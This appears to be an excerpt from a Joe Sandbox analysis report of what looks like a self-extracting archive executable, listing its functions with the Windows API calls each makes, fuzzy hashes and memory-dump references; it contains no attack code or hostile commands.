Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID:
API String ID: 3569833718-0
Opcode ID: 1d99383e1aec24e11e64b0f68f413c99e342f319a1008010917df5fcfdef6405
Instruction ID: 406f19a32f28bacdec5072fe2377a3f94956c4b59c9865beaceb5d11aac4fac3
Opcode Fuzzy Hash: 1d99383e1aec24e11e64b0f68f413c99e342f319a1008010917df5fcfdef6405
Instruction Fuzzy Hash: 8041E276B186868BFB108F61FC10BA927A1EB89B88F501131DD0A47B89CF7FD515CB05

Function 00007FF6EF6DB78C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(?,?,00000000,00007FF6EF6DB993,?,?,?,00007FF6EF6D96FE,?,?,?,00007FF6EF6D96B9), ref: 00007FF6EF6DB811
GetLastError.KERNEL32(?,?,00000000,00007FF6EF6DB993,?,?,?,00007FF6EF6D96FE,?,?,?,00007FF6EF6D96B9), ref: 00007FF6EF6DB81F
LoadLibraryExW.KERNEL32(?,?,00000000,00007FF6EF6DB993,?,?,?,00007FF6EF6D96FE,?,?,?,00007FF6EF6D96B9), ref: 00007FF6EF6DB849
FreeLibrary.KERNEL32(?,?,00000000,00007FF6EF6DB993,?,?,?,00007FF6EF6D96FE,?,?,?,00007FF6EF6D96B9), ref: 00007FF6EF6DB88F
GetProcAddress.KERNEL32(?,?,00000000,00007FF6EF6DB993,?,?,?,00007FF6EF6D96FE,?,?,?,00007FF6EF6D96B9), ref: 00007FF6EF6DB89B

Strings

api-ms-, xrefs: 00007FF6EF6DB831

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: c77115432eaf256f3fa09f936935641facb5cfb8b18f71be155dd5b9e2467c82
Instruction ID: 0742754686d3c9718f48748c8889190c9f657ae779631c0e59754534e61c1d15
Opcode Fuzzy Hash: c77115432eaf256f3fa09f936935641facb5cfb8b18f71be155dd5b9e2467c82
Instruction Fuzzy Hash: 6F31B423F1A64193FE15AB1698117B5239CBF48BA0F290535DD1D87398EF3EE4409B09

Function 00007FF6EF6D2288 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadBitmapW.USER32 ref: 00007FF6EF6D229E
GetObjectW.GDI32 ref: 00007FF6EF6D22CF
DeleteObject.GDI32 ref: 00007FF6EF6D2309
DeleteObject.GDI32 ref: 00007FF6EF6D2339

Part of subcall function 00007FF6EF6D0C0C: FindResourceW.KERNEL32 ref: 00007FF6EF6D0C25
Part of subcall function 00007FF6EF6D0C0C: SizeofResource.KERNEL32 ref: 00007FF6EF6D0C41
Part of subcall function 00007FF6EF6D0C0C: LoadResource.KERNEL32 ref: 00007FF6EF6D0C5B
Part of subcall function 00007FF6EF6D0C0C: LockResource.KERNEL32 ref: 00007FF6EF6D0C6D
Part of subcall function 00007FF6EF6D0C0C: GlobalAlloc.KERNELBASE ref: 00007FF6EF6D0C8E
Part of subcall function 00007FF6EF6D0C0C: GlobalLock.KERNEL32 ref: 00007FF6EF6D0CA3
Part of subcall function 00007FF6EF6D0C0C: CreateStreamOnHGlobal.COMBASE ref: 00007FF6EF6D0CD0
Part of subcall function 00007FF6EF6D0C0C: GdipAlloc.GDIPLUS ref: 00007FF6EF6D0CE6
Part of subcall function 00007FF6EF6D0C0C: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF6EF6D0D51
Part of subcall function 00007FF6EF6D0C0C: GlobalUnlock.KERNEL32 ref: 00007FF6EF6D0D74
Part of subcall function 00007FF6EF6D0C0C: GlobalFree.KERNEL32 ref: 00007FF6EF6D0D7D

Strings

], xrefs: 00007FF6EF6D22D7

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Global$Resource$Object$AllocBitmapCreateDeleteGdipLoadLock$FindFreeFromSizeofStreamUnlock
String ID: ]
API String ID: 3561356813-3352871620
Opcode ID: 7b4fa83177bad47321e5e6416dc10b225e33d74c417afac1c96156198ac862ae
Instruction ID: b82c6ff8f57762fd98b12742e74b6e0adb586de280f568e71af650b21a481a64
Opcode Fuzzy Hash: 7b4fa83177bad47321e5e6416dc10b225e33d74c417afac1c96156198ac862ae
Instruction Fuzzy Hash: 78119627B0D24243FE24AB11A6547796395AFC8BC4F190035DD4E87B89DE3FE804DB0A

Function 00007FF6EF6BC990 Relevance: 7.6, APIs: 5, Instructions: 121
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF6EF6BCA43
GetLastError.KERNEL32 ref: 00007FF6EF6BCA52
CreateFileW.KERNEL32 ref: 00007FF6EF6BCA95
GetLastError.KERNEL32 ref: 00007FF6EF6BCA9E
SetFileTime.KERNEL32 ref: 00007FF6EF6BCAF8

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 4bc8a05c1fc9085f767ae555234f7091697c172257b6d963882fc4571e3fc474
Instruction ID: 48cfee534118c2b3be91f2ad73d1d821a40f1bbf42748adb64f791bfe9ff1b02
Opcode Fuzzy Hash: 4bc8a05c1fc9085f767ae555234f7091697c172257b6d963882fc4571e3fc474
Instruction Fuzzy Hash: 88415633A0828147FB248F24E4153BA2754E784BB8F140735EE6E87AC8CF7ED5449B05

Function 00007FF6EF6E38C4 Relevance: 7.6, APIs: 5, Instructions: 114
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00007FF6EF6E39E6

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: b947aa5d3a64ffecfaea7f73750458e3202313a70507ae23ea93805b26baa352
Instruction ID: ec7b8d0368f2cd627d761eaf5fca151d1becb6752e56b37015a7623baecd0b0f
Opcode Fuzzy Hash: b947aa5d3a64ffecfaea7f73750458e3202313a70507ae23ea93805b26baa352
Instruction Fuzzy Hash: 05414223B0AA0283FB108F42AC027756799BF44BA0F094534DD1DCB395EF3EE540A30A

Function 00007FF6EF6D4EF4 Relevance: 7.5, APIs: 5, Instructions: 29windowsynchronizationCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 00007FF6EF6D4F11
GetMessageW.USER32 ref: 00007FF6EF6D4F28
TranslateMessage.USER32 ref: 00007FF6EF6D4F33
DispatchMessageW.USER32 ref: 00007FF6EF6D4F3E
WaitForSingleObject.KERNEL32(?,?,?,?,?,?,00000001,?,00007FF6EF6D2DB7), ref: 00007FF6EF6D4F4C

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Message$DispatchObjectPeekSingleTranslateWait
String ID:
API String ID: 3621893840-0
Opcode ID: ef41243d3d78035141505aa551c49f7752d389ace621211df6dc683de2f32d7f
Instruction ID: c506be9ed6b33e646559a9bf1b8437d8caa052701157875e33626d1db6e29ab8
Opcode Fuzzy Hash: ef41243d3d78035141505aa551c49f7752d389ace621211df6dc683de2f32d7f
Instruction Fuzzy Hash: FAF0AF27B2844683FB509B20F894B3A2310FFE4B01F540031DA4E82850CE3EE458CB0A

Function 00007FF6EF6D2090 Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 00007FF6EF6D20A6
GetMessageW.USER32 ref: 00007FF6EF6D20BD
IsDialogMessageW.USER32 ref: 00007FF6EF6D20D4
TranslateMessage.USER32 ref: 00007FF6EF6D20E3
DispatchMessageW.USER32 ref: 00007FF6EF6D20EE

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 202ca0dbb777a082bc5ea6dd3ee882e1ba86617a9869b5a7865a3a02ab6cd1fb
Instruction ID: a9a917ed884a4b8b10f4aabb588bb9c90f78f601e26d076027c04ceff6f90ab6
Opcode Fuzzy Hash: 202ca0dbb777a082bc5ea6dd3ee882e1ba86617a9869b5a7865a3a02ab6cd1fb
Instruction Fuzzy Hash: D3F0EC6AA3855283FF909B24F895B362360BFD0B05F801031EA4E82854DF3FE119DB0A

Function 00007FF6EF6D4E64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32 ref: 00007FF6EF6D4E92
SetEnvironmentVariableW.KERNELBASE ref: 00007FF6EF6D4ED2

Strings

sfxcmd, xrefs: 00007FF6EF6D4E8B
sfxpar, xrefs: 00007FF6EF6D4ECB

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 9355028234e3c1df3de2f0f2c45ed962507e0bb30c5847decd366f5ed0387a86
Instruction ID: 2c446f353a0fc37ffe618cd8c0e41929430b806796c183eaaacf2a27c6ff136a
Opcode Fuzzy Hash: 9355028234e3c1df3de2f0f2c45ed962507e0bb30c5847decd366f5ed0387a86
Instruction Fuzzy Hash: 2E018653F0975283FE50AB11E8153B92398BF59B81F544035D88DCA392EE2FE544EB0A

Function 00007FF6EF6D11A0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetClassNameW.USER32 ref: 00007FF6EF6D11C9
SHAutoComplete.SHLWAPI ref: 00007FF6EF6D120D

Part of subcall function 00007FF6EF6C6B34: CompareStringW.KERNEL32(?,?,00007FF6EF6BFD10), ref: 00007FF6EF6C6B53

FindWindowExW.USER32 ref: 00007FF6EF6D11F7

Strings

EDIT, xrefs: 00007FF6EF6D11D3, 00007FF6EF6D11EB

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: e21d80ba2fcda0afe61ee5e138a94cc6b7d8cc84eeae1a0dd95cd5f916355b23
Instruction ID: b6ee7ed1402684b8644d17dda66c70e2165b4aeade4efeab462b051e7f5c10ed
Opcode Fuzzy Hash: e21d80ba2fcda0afe61ee5e138a94cc6b7d8cc84eeae1a0dd95cd5f916355b23
Instruction Fuzzy Hash: FE016D53B18A4683FE60AB51BC243B653A8AF98780F441032C94DC7655DE3FE1449B0A

Function 00007FF6EF6D700C Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF6EF6D701B

Part of subcall function 00007FF6EF6D6D00: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF6EF6D6D22

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF6EF6D7030
__scrt_release_startup_lock.LIBCMT ref: 00007FF6EF6D709E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF6EF6D70F1

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
Opcode ID: a3f69c83429b0ae4a0281d99947e56bbaeef1c09745b8a4fe67f7e7d88935c27
Instruction ID: f34721d218e701e208dd24b9fa3599e63ff41dc9b133846d25083a8e2170dc7e
Opcode Fuzzy Hash: a3f69c83429b0ae4a0281d99947e56bbaeef1c09745b8a4fe67f7e7d88935c27
Instruction Fuzzy Hash: 18311B63E0C24787FA14BB2498113B913999F85384FA44535E94DCB2D3DE2FB545AB0B

Function 00007FF6EF6BC7F4 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF6EF6BC81C
ReadFile.KERNELBASE ref: 00007FF6EF6BC83B
GetLastError.KERNEL32 ref: 00007FF6EF6BC86F
GetLastError.KERNEL32 ref: 00007FF6EF6BC88E

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: a323257c6cd013e66bdbc91a7b513783e4ef1c7ac85a55a09a4dd0f8fb45d599
Instruction ID: 7e5f1aa01cc8a1fd9449feb6bdbf0d32b804f6764855f5a92a083bbfa082701c
Opcode Fuzzy Hash: a323257c6cd013e66bdbc91a7b513783e4ef1c7ac85a55a09a4dd0f8fb45d599
Instruction Fuzzy Hash: E221A423E0C54287EA605B21A4003396B58BF45B98F144931FA5DC67CDDF6FEA40B74A

Function 00007FF6EF6C2948 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF6EF6C29CF
LoadStringW.USER32 ref: 00007FF6EF6C29E8

Strings

Extracting %s, xrefs: 00007FF6EF6C2970

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: LoadString
String ID: Extracting %s
API String ID: 2948472770-2318847974
Opcode ID: 2236e34311bc97c09f5d79616d4e94da909976376acd17a317b49b188287e802
Instruction ID: 2aa698e973efca87af414c4a998c31819cbfa063d3fbba2ddf86089af9a7704a
Opcode Fuzzy Hash: 2236e34311bc97c09f5d79616d4e94da909976376acd17a317b49b188287e802
Instruction Fuzzy Hash: 3E115B7AB0860187EA508F06BC40269B7A5BF89FD0F544039CE8CD3365EF7EE5518349

Function 00007FF6EF6C5990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FF6EF6C59CC
SetThreadPriority.KERNEL32 ref: 00007FF6EF6C5A22

Strings

CreateThread failed, xrefs: 00007FF6EF6C59DA

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Thread$CreatePriority
String ID: CreateThread failed
API String ID: 2610526550-3849766595
Opcode ID: dd105b4aed30a7a80ca3141c297ce4f78b67ecdfe065c40b3858bd4ccbe00e44
Instruction ID: 73f090bcbb2937f23018453a07e486f97b614dece2504151aafd885c56cdf2da
Opcode Fuzzy Hash: dd105b4aed30a7a80ca3141c297ce4f78b67ecdfe065c40b3858bd4ccbe00e44
Instruction Fuzzy Hash: 07115E33909A4293EB149B11F8402797365FF80798F544431E68D87269EF3EE556D709

Function 00007FF6EF6D13A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6EF6C4F90: GetSystemDirectoryW.KERNEL32(00000000,00007FF6EF6C3830), ref: 00007FF6EF6C4FBE

OleInitialize.OLE32 ref: 00007FF6EF6D13BA
SHGetMalloc.SHELL32 ref: 00007FF6EF6D1408

Strings

riched20.dll, xrefs: 00007FF6EF6D13A9

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: DirectoryInitializeMallocSystem
String ID: riched20.dll
API String ID: 174490985-3360196438
Opcode ID: 5b567382f467e4cd33e301c36b14eb1db3794b6038e05db0f5c483eedac7de30
Instruction ID: 229264b75108c040adab4f8cb16afd3c1f21a3d123ef249d30cae4deac979726
Opcode Fuzzy Hash: 5b567382f467e4cd33e301c36b14eb1db3794b6038e05db0f5c483eedac7de30
Instruction Fuzzy Hash: 80F0AF7251CA8183EB00DF20F8042AEB3A0FB98304F400136E58E83A98EF7EE158CB05

Function 00007FF6EF6E340C Relevance: 4.7, APIs: 3, Instructions: 238COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF6EF6E3493
MultiByteToWideChar.KERNEL32 ref: 00007FF6EF6E3558
WideCharToMultiByte.KERNEL32 ref: 00007FF6EF6E36E8

Part of subcall function 00007FF6EF6E1C94: HeapAlloc.KERNEL32 ref: 00007FF6EF6E1CD2

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
